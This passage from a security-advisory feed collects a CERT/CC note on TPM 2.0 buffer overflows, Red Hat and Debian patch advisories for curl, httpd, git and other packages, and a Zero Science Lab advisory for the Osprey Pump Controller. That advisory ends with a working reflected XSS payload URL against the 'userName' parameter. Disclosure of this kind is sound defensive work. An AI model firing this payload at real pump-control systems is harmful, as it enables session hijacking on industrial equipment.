An out-of-bounds write vulnerability exists in TPM2.0's Module Library allowing writing of a 2-byte data past the end of TPM2.0 command in the CryptParameterDecryption routine. An attacker who can successfully exploit this vulnerability can lead to denial of service (crashing the TPM chip/process or rendering it unusable) and/or arbitrary code execution in the TPM context.

**Overview**

Two buffer overflow vulnerabilities were discovered in the Trusted Platform Module (TPM) 2.0 reference library specification, currently at Level 00, Revision 01.59 November 2019. An attacker who has access to a TPM-command interface can send maliciously-crafted commands to the module and trigger these vulnerabilities. This allows either read-only access to sensitive data or overwriting of normally protected data that is only available to the TPM (e.g., cryptographic keys).

**Description**

Trusted Platform Module (TPM) technology is a hardware-based solution that provides secure cryptographic functions to the operating systems on modern computers, making it resistant to tampering. As cloud computing and virtualization have become more popular in recent years, software-based TPM implementations have also gained popularity. TPM can be implemented in the form of Discrete, Integrated or Firmware TPM in its hardware form. The virtual TPM's exists in Hypervisor form or in a purely software-based TPM implementation e.g., swtpm. The Trusted Computing Group (TCG) is responsible for maintaining the TPM specifications, which are actively contributed to by both hardware and software manufacturers. The TCG released the TPM 2.0 specifications in October 2014 and has since revised them multiple times. The latest version, Revision 01.59, was released in November 2019. Many TPM hardware and software manufacturers use these specifications to build firmware that complies with standards and provides a secure interface to sensitive cryptographic data. TPM is employed in a variety of devices, from specialized enterprise-grade hardware to Internet of Things (IoT) appliances.

The TPM Library Specification Architecture documents "Session-based encryption" that allows a cryptographic client application to perform various operations, including those that provide Parameter Encryption capabilities. Session-based encryption may be used to ensure confidentiality of these parameters. The operating system or the client software relies on the TPM to securely provide capabilities such as Cipher Feedback (CFB) for block cipher or streaming hash-based XOR obfuscation of the intended parameter payloads.

Quarkslab security researchers found two vulnerabilities in the way the TPM reference specification processes some of these parameters that are part of TPM commands. An Out Of Bound (OOB) read vulnerability in the CryptParameterDecryption() routine allowed a 2-byte read access to data that was not part of the current session. It was also possible to write 2-bytes past the end of the current command buffer resulting in corruption of memory.

An attacker with access to a device built with a vulnerable version of the TPM can trigger this bug by sending crafted commands to the TPM. The vulnerable TPM can thus be tricked to access data that is not part of the intended operation. As the OS relies on the TPM firmware for these functions, it may be difficult to detect or prevent such access using traditional host-based security capabilities.

**Impact**

An authenticated, local attacker could send maliciously crafted commands to a vulnerable TPM allowing access to sensitive data. In some cases, the attacker can also overwrite protected data in the TPM firmware. This may lead to a crash or arbitrary code execution within the TPM. Because the attacker's payload runs within the TPM, it may be undetectable by other components of the target device.

**Solution**

**_Apply an update_** The Trusted Computing Group (TCG) has released an update to their Errata for TPM2.0 Library Specification with instructions to address these vulnerabilities. To ensure the security of their systems, users should apply any updates provided by hardware and software manufacturers through their supply chain as soon as possible. Updating the firmware of TPM chips may be necessary, and this can be done through an OS vendor or the original equipment manufacturer (OEM). In some cases, the OEM may require resetting the TPM to its original factory default values as part of the update process.

Users in high-assurance computing environments should consider using TPM Remote Attestation to detect any changes to devices and ensure their TPM is tamper proofed. As these attacks involve TPM-based software, mechanisms such as user-password or PIN protection and tpm-totp do not protect against attacks leveraging the vulnerabilities discussed in this article.

**Note:** the TCG's Errata covers a larger scope and addresses additional security issues beyond the two vulnerabilities discussed in this advisory.

**Acknowledgements**

Thanks to Francisco Falcon and Ivan Arce of Quarkslab who researched and reported these vulnerabilities, respectively. The TCG and their members worked closely with us and other vendors to coordinate the disclosure of these vulnerabilities.

This document was written by Vijay Sarvepalli.

**Vendor Information**

Filter by content: Additional information available

 Sort by:

**CVE IDs:**

CVE-2023-1017 CVE-2023-1018

**API URL:**

VINCE JSON | CSAF

**Date Public:**

2023-02-28

**Date First Published:**

2023-02-28

**Date Last Updated:**

2023-02-28 18:58 UTC

**Document Revision:**

2

CVE-2023-1017: CERT/CC Vulnerability Note VU#782720

Sudo before 1.9.13p2 has a double free in the per-command chroot feature.

CVE-2023-27320: Stable Release

Red Hat Security Advisory 2023-0945-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:0945-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0945  
Issue date:        2023-02-28  
CVE Names:         CVE-2022-4378   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
7.7 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server E4S (v. 7.7) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
(CVE-2022-4378)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2152548 - CVE-2022-4378 kernel: stack overflow in do_proc_dointvec and proc_skip_spaces

6. Package List:

Red Hat Enterprise Linux Server E4S (v. 7.7):

Source:  
kpatch-patch-3_10_0-1062_68_1-1-1.el7.src.rpm  
kpatch-patch-3_10_0-1062_70_1-1-1.el7.src.rpm

ppc64le:  
kpatch-patch-3_10_0-1062_68_1-1-1.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1062_68_1-debuginfo-1-1.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1062_70_1-1-1.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1062_70_1-debuginfo-1-1.el7.ppc64le.rpm

x86_64:  
kpatch-patch-3_10_0-1062_68_1-1-1.el7.x86_64.rpm  
kpatch-patch-3_10_0-1062_68_1-debuginfo-1-1.el7.x86_64.rpm  
kpatch-patch-3_10_0-1062_70_1-1-1.el7.x86_64.rpm  
kpatch-patch-3_10_0-1062_70_1-debuginfo-1-1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/3zwNzjgjWX9erEAQgckw/7B9elFpmuesMfyPfX2TOojH8y3cplE1Bl  
MkYwIDtD1hsuQPs+CyAczXmybgFA2E+Lruldm9MI3qcyKkQDUjsKUTyO+OKqPQz/  
TgohO3q04tg/uEMGod96pcj5gn+/wddXzMH69tWLkAGlj+IS7vaj1zcCzpqoRkBL  
Ld4QCi4lAZcByXn8KZpcqT8SUJhhCHcSwJjgjBiiWlMuh1BQpTcnaOU+YSRUK7ox  
e/eRn3KzkXf0mEp648t6SLs74IFrmlgtswUGZYxRGVBZnm9U1hl8uIFOMZNeekKf  
TL2K+r2KwcFEOAr1q2oVaaqgNyr1r/P094rZqUtdah80gu8xnaH2nXV7pjOH2xy8  
oorD/XpbZyg6/3XZwKRGMVJkcyqBaUiNy9I85qi0kffk52rQWjP88TKPM9Nq5S2T  
ZkmLOgTNelWNsv10KwR87K+rg9+F+GlFTEtGwUOcmlLEVwd+cAJb6HAXJrBULXCA  
5WNQacQtJ4JQ6iSaZfNRDfsHk44cXzeSMpyKDqZUlaVsZaq4BtgHMRfnSNLnw1k1  
N2rsmA2Dp6+CHY4nStTOsFIqCqh7HHqVLxUxIoGegwTdzbD59EdCICiIOj9bUJDL  
62urASH/uAxCFMFPaAx2JefEZkwCzPYJVTxoejFnESSkkxJ5rIrxiz05HgNVkA/g  
SfHzKU8H41E=  
=xuoe  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0945-01

Red Hat Security Advisory 2023-0895-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. Issues addressed include denial of service and out of bounds read vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.11.29 security update  
Advisory ID:       RHSA-2023:0895-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0895  
Issue date:        2023-02-28  
CVE Names:         CVE-2021-38561 CVE-2022-23521 CVE-2022-41903   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.11.29 is now available with  
updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

Security Fix(es):

* golang: out-of-bounds read in golang.org/x/text/language leads to DoS  
(CVE-2021-38561)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For OpenShift Container Platform 4.11 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

You can download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
can be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.

The sha values for the release are:

(For x86_64 architecture)  
The image digest is  
sha256:1105aa27f627a99a2b3a8b6257a12697b2033a44f1fa2af41491a8e66cd279ac

(For s390x architecture)  
The image digest is  
sha256:65ad21140d0ab515f17eefe4fe12a05cfa5dc7422c09569fd141905f0ca8052e

(For ppc64le architecture)  
The image digest is  
sha256:3fa53f4050d344ece7154e3aa40d2c01ec6b054aead77ace1d2f33651d0ef35d

(For aarch64 architecture)  
The image digest is  
sha256:8f1cac0afb3469f853e8f630c59a476ca77fa1144be761ba24d59ed261a6c425

All OpenShift Container Platform 4.11 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-6002 - Add more logs to "oc extract" in mco-first boot service   
OCPBUGS-6783 - [release-4.11] gather Machine objects  
OCPBUGS-6879 - Branch name should sanitised to match actual github branch name in repository plr list  
OCPBUGS-7043 - "Delete dependent objects of this resource" might cause confusions  
OCPBUGS-7069 - PipelineRun task status overlaps status text  
OCPBUGS-7127 - Editing Pipeline in the ocp console to get information error  
OCPBUGS-7510 - [release-4.11] fail early on missing node status envs  
OCPBUGS-7539 - Endless rerender loop and a stuck browser on the add and topology page when SBO is installed  
OCPBUGS-7590 - thanos-ruler-user-workload-1 pod is getting repeatedly re-created after upgrade do 4.10.41  
OCPBUGS-7720 - set default timeouts in etcdcli

6. References:

https://access.redhat.com/security/cve/CVE-2021-38561  
https://access.redhat.com/security/cve/CVE-2022-23521  
https://access.redhat.com/security/cve/CVE-2022-41903  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/3zvdzjgjWX9erEAQgaIg//QL3Zh6KgmG6niBw3F41un4n4P0lEM7mA  
xpPA7Rj+M6XXwpyZK5YHl6gffadeqAnbCujJeSpUQPLjsa6oLexldCeFN+GOdyM4  
pjOtkNXTaRyaETO92qcBd94Z2/iz/ZbngCQHiyNjQBzDGlQCwvd3Gs0AO1nb1QNR  
NbWntM13nlOVkPj5c325gCt3A+Zje3J+iQmkSzNt5fgGACEZVQqMRjY8SooZmRIy  
Hm+rGhOXdX1Y9jtm7+b0fGzDss/aAuKtpk5j8HRzOu3XmtLymmtFQJ+GD/axM7wc  
2YMQI7za4+jm6BQN0TVH1i8kUMwpvH4Z79z6jYRqUqqexbSPGPRJiM40kgObt4NH  
fyQjPx12S+tF+TbI5XHLZk2QUM0r4sf/GJ2daZepHN6lfUtoGDw5SpAVPMc5LiL9  
uO2eeY+cAQmrrifRD1kyOhVD9YRoZ8C9jOgHEcq2pPqX1p6s7xXfLfZZrD3T0dcd  
tw1oTblxHZqYzLz++7UKdBgbGT35JfYaovO+iKU6E5/RZBk+yukpcJKp/Utk+1OQ  
G5Qoj5UjWSoMkTjC6ZRlfbRx7zff2QMbrXm7SHw26BV3wbKltaE+/xodt1QyXgew  
Pyh1MizgrCahXUuhLbXCQplPegSvP1yqfJFFkvW3XxaFEZgj7xLOQnJb029daDRg  
h8bP5Bbx5jM=  
=ic5n  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0895-01

Debian Linux Security Advisory 5365-1 - Patrick Monnerat discovered that Curl's support for "chained" HTTP compression algorithms was susceptible to denial of service.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5365-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
February 27, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : curl  
CVE ID         : CVE-2023-23916

Patrick Monnerat discovered that Curl's support for "chained" HTTP  
compression algorithms was susceptible to denial of service.

For the stable distribution (bullseye), this problem has been fixed in  
version 7.74.0-1.3+deb11u7. This update also fixes a regression in  
the previously released fix for CVE-2022-27774.

We recommend that you upgrade your curl packages.

For the detailed security status of curl please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/curl

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmP9Il4ACgkQEMKTtsN8  
TjZKEA//cK64gwXlsdkBMurkfaS4XVzPfAIPoR3b9Zun57OnO79Hb+Lubj23iva0  
PpnHi5cyLDRC4RkQrICAygGGZkqBg0s5kA2aNv6sNF4CrF01cDHi5xbeb8SIb3K2  
S6n/UOXST1zWlPjPsewoe+ct1dC53+24pelwVWNB8fRdvnbD49XQQ7eI8hZAWJpt  
ebFXkfi7xOPrSgHJdOyHAjJK3qySqfOgfbBY3qy650Po3SHS+YAqztRl+/TQf/Al  
fonzIypIHpcTDUyzJ9qBfLTUbui0HgjiaQbepp42+mUb/ajtbSlVHf+a+MXUm2Vr  
5kE7SDdoXTQDHkdiuo0SFpxOhhGG3BV7RecX+4tKnfTP5ADr2MZ0XnVq5RJ6y9eL  
1JOTxdFBPIIjzIpdCN2NrQdSXEk9faZv6L3HXoUA92rtXaxdqYD0UkNsOBYjBtJT  
4TZOS3br3bsYUxveFGeJsHA0DTcv+k6NtHxE9XyTvPwjPZyAgck35K+4zPZkQxO1  
fHGWXVCODsPm6g/TzPP1GrBzuLGS9fbhAF2+cVQkSPoO8eS7salDkR4k7HCshNuY  
5qhLi5PQCTrlIhOfOueRoBj0dYtR96WePh8K6mQ1gA/KtQ+n/Ps+Obpnv75cdOF8  
K03rqj/CFODZ/IqinIUr+8b+Pt50kTenU4Z6pacqleEz4WcVePc=  
=7ySA  
-----END PGP SIGNATURE-----

Debian Security Advisory 5365-1

Osprey Pump Controller version 1.0.1 suffers from a cross site scripting vulnerability.

    Osprey Pump Controller 1.0.1 Unauthenticated Reflected XSSVendor: ProPump and Controls, Inc.Product web page: https://www.propumpservice.com | https://www.pumpstationparts.comAffected version: Software Build ID 20211018, Production 10/18/2021                  Mirage App: MirageAppManager, Release [1.0.1]                  Mirage Model 1, RetroBoard IISummary: Providing pumping systems and automated controls forgolf courses and turf irrigation, municipal water and sewer,biogas, agricultural, and industrial markets. Osprey: door-mounted,irrigation and landscape pump controller.Technology hasn't changed dramatically on pump and electric motorsin the last 30 years. Pump station controls are a different story.More than ever before, customers expect the smooth and efficientoperation of VFD control. Communications—monitoring, remote control,and interfacing with irrigation computer programs—have become commonrequirements. Fast and reliable accessibility through cell phoneshas been a game changer.ProPump & Controls can handle any of your retrofit needs, from upgradingan older relay logic system to a powerful modern PLC controller, toconverting your fixed speed or first generation VFD control system tothe latest control platform with communications capabilities.We use a variety of solutions, from MCI-Flowtronex and Watertronicspackage panels to sophisticated SCADA systems capable of controllingand monitoring networks of hundreds of pump stations, valves, tanks,deep wells, or remote flow meters.User friendly system navigation allows quick and easy access to allcritical pump station information with no password protection unlessrequested by the customer. Easy to understand control terminology allowsany qualified pump technician the ability to make basic changes withoutsupport. Similar control and navigation platform compared to one of themost recognized golf pump station control systems for the last twentyyears make it familiar to established golf service groups nationwide.Reliable push button navigation and LCD information screen allows theuse of all existing control panel door switches to eliminate the commonproblems associated with touchscreens.Global system configuration possibilities allow it to be adapted tovirtually any PLC or relay logic controlled pump stations being used inthe industrial, municipal, agricultural and golf markets that operatevariable or fixed speed. On board Wi-Fi and available cellular modemoption allows complete remote access.Desc: Input passed to the GET parameter 'userName' is not properly sanitisedbefore being returned to the user. This can be exploited to execute arbitraryHTML/JS code in a user's browser session in context of an affected site.Tested on: Apache/2.4.25 (Raspbian)           Raspbian GNU/Linux 9 (stretch)           GNU/Linux 4.14.79-v7+ (armv7l)           Python 2.7.13 [GCC 6.3.0 20170516]           GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git           PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2023-5751Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5751.php05.01.2023--http://TARGET/index.php?userName=%22%3E%3Cscript%3Econfirm(251)%3C/script%3E

Osprey Pump Controller 1.0.1 Cross Site Scripting

Red Hat Security Advisory 2023-0970-01 - The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server. Issues addressed include HTTP response splitting and out of bounds read vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: httpd security and bug fix update  
Advisory ID:       RHSA-2023:0970-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0970  
Issue date:        2023-02-28  
CVE Names:         CVE-2006-20001 CVE-2022-36760 CVE-2022-37436   
=====================================================================

1. Summary:

An update for httpd is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The httpd packages provide the Apache HTTP Server, a powerful, efficient,  
and extensible web server.

Security Fix(es):

* httpd: mod_dav: out-of-bounds read/write of zero byte (CVE-2006-20001)

* httpd: mod_proxy_ajp: Possible request smuggling (CVE-2022-36760)

* httpd: mod_proxy: HTTP response splitting (CVE-2022-37436)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* httpd-init fails to create localhost.crt, localhost.key due to "sscg"  
default now creates a /dhparams.pem and is not idempotent if the file  
/dhparams.pem already exists. (BZ#2165975)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, the httpd daemon will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2161773 - CVE-2022-37436 httpd: mod_proxy: HTTP response splitting  
2161774 - CVE-2006-20001 httpd: mod_dav: out-of-bounds read/write of zero byte  
2161777 - CVE-2022-36760 httpd: mod_proxy_ajp: Possible request smuggling

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
httpd-2.4.53-7.el9_1.1.src.rpm

aarch64:  
httpd-2.4.53-7.el9_1.1.aarch64.rpm  
httpd-core-2.4.53-7.el9_1.1.aarch64.rpm  
httpd-core-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm  
httpd-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm  
httpd-debugsource-2.4.53-7.el9_1.1.aarch64.rpm  
httpd-devel-2.4.53-7.el9_1.1.aarch64.rpm  
httpd-tools-2.4.53-7.el9_1.1.aarch64.rpm  
httpd-tools-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm  
mod_ldap-2.4.53-7.el9_1.1.aarch64.rpm  
mod_ldap-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm  
mod_lua-2.4.53-7.el9_1.1.aarch64.rpm  
mod_lua-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm  
mod_proxy_html-2.4.53-7.el9_1.1.aarch64.rpm  
mod_proxy_html-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm  
mod_session-2.4.53-7.el9_1.1.aarch64.rpm  
mod_session-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm  
mod_ssl-2.4.53-7.el9_1.1.aarch64.rpm  
mod_ssl-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm

noarch:  
httpd-filesystem-2.4.53-7.el9_1.1.noarch.rpm  
httpd-manual-2.4.53-7.el9_1.1.noarch.rpm

ppc64le:  
httpd-2.4.53-7.el9_1.1.ppc64le.rpm  
httpd-core-2.4.53-7.el9_1.1.ppc64le.rpm  
httpd-core-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm  
httpd-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm  
httpd-debugsource-2.4.53-7.el9_1.1.ppc64le.rpm  
httpd-devel-2.4.53-7.el9_1.1.ppc64le.rpm  
httpd-tools-2.4.53-7.el9_1.1.ppc64le.rpm  
httpd-tools-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_ldap-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_ldap-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_lua-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_lua-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_proxy_html-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_proxy_html-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_session-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_session-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_ssl-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_ssl-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm

s390x:  
httpd-2.4.53-7.el9_1.1.s390x.rpm  
httpd-core-2.4.53-7.el9_1.1.s390x.rpm  
httpd-core-debuginfo-2.4.53-7.el9_1.1.s390x.rpm  
httpd-debuginfo-2.4.53-7.el9_1.1.s390x.rpm  
httpd-debugsource-2.4.53-7.el9_1.1.s390x.rpm  
httpd-devel-2.4.53-7.el9_1.1.s390x.rpm  
httpd-tools-2.4.53-7.el9_1.1.s390x.rpm  
httpd-tools-debuginfo-2.4.53-7.el9_1.1.s390x.rpm  
mod_ldap-2.4.53-7.el9_1.1.s390x.rpm  
mod_ldap-debuginfo-2.4.53-7.el9_1.1.s390x.rpm  
mod_lua-2.4.53-7.el9_1.1.s390x.rpm  
mod_lua-debuginfo-2.4.53-7.el9_1.1.s390x.rpm  
mod_proxy_html-2.4.53-7.el9_1.1.s390x.rpm  
mod_proxy_html-debuginfo-2.4.53-7.el9_1.1.s390x.rpm  
mod_session-2.4.53-7.el9_1.1.s390x.rpm  
mod_session-debuginfo-2.4.53-7.el9_1.1.s390x.rpm  
mod_ssl-2.4.53-7.el9_1.1.s390x.rpm  
mod_ssl-debuginfo-2.4.53-7.el9_1.1.s390x.rpm

x86_64:  
httpd-2.4.53-7.el9_1.1.x86_64.rpm  
httpd-core-2.4.53-7.el9_1.1.x86_64.rpm  
httpd-core-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm  
httpd-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm  
httpd-debugsource-2.4.53-7.el9_1.1.x86_64.rpm  
httpd-devel-2.4.53-7.el9_1.1.x86_64.rpm  
httpd-tools-2.4.53-7.el9_1.1.x86_64.rpm  
httpd-tools-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm  
mod_ldap-2.4.53-7.el9_1.1.x86_64.rpm  
mod_ldap-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm  
mod_lua-2.4.53-7.el9_1.1.x86_64.rpm  
mod_lua-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm  
mod_proxy_html-2.4.53-7.el9_1.1.x86_64.rpm  
mod_proxy_html-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm  
mod_session-2.4.53-7.el9_1.1.x86_64.rpm  
mod_session-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm  
mod_ssl-2.4.53-7.el9_1.1.x86_64.rpm  
mod_ssl-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2006-20001  
https://access.redhat.com/security/cve/CVE-2022-36760  
https://access.redhat.com/security/cve/CVE-2022-37436  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/3zuNzjgjWX9erEAQj8Rw/+Lo4L2fajs5cjfJGlBZU9i7mBNfFCJCks  
BSZ63H60gFLhncObvfY3N2wlNjyKL5lWA2w6hgTjnvhUQgYTkEVay7tgtLt359oy  
6c2J8ZKvjhBNeVqLhgnI5/gzzXsqVPwRLlRWlHZwrp1o5Edx0GDpcQUZTvCG46Uy  
oXpacnO9DnWuCMjiTCkM+MUFYrpZxVq4ezjOp1pB5ySlX4c2k3wYP3Usw0H88ZK+  
tVS/Cupd9JItOLriPlRJWQzuddtlzFe8KbETUOPcrOBwdgDupmUhYRPuBDwUuIKP  
4dgJ2t33fJGrPzCAArJkHnwgPchYrAEqvfbjwgLD4sBMr2mu40axgTKP6XYJ5ZsU  
Y6v/bszTLGnqJ5AoPs06PZoetU7Qt9hDN8FFJJK5ou1yTXMCpoyYj9QaQ4qkKfKC  
P/ooesrX2BSo/mrnx0XL0SoSPiKuHGKE8T0dhdw12N5mFrR/IWNxi5/u7o0jrIUt  
6qCz4jNS4xgMbdAMVvxO+CUbmO260S57kEvm+YHXxSSNZYGbDQpvx9EnCLvuraDK  
CHyUPjWHh1/a3xisc+KCn2CJf9gBMwCd7MpcU0enScrAUUE/VYtSejnfjP6NF1js  
gK0pSZN/G+YMRtBjajTCwPIAA6nAZt3zBJSfpxxJP26qT9oOpz/SxXcPFz2IbE28  
ZB4pvXtUnng=  
=WleW  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0970-01

Red Hat Security Advisory 2023-0978-01 - Git is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection. Issues addressed include heap overflow and integer overflow vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: git security update  
Advisory ID:       RHSA-2023:0978-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0978  
Issue date:        2023-02-28  
CVE Names:         CVE-2022-23521 CVE-2022-41903   
=====================================================================

1. Summary:

An update for git is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64

3. Description:

Git is a distributed revision control system with a decentralized  
architecture. As opposed to centralized version control systems with a  
client-server model, Git ensures that each working copy of a Git repository  
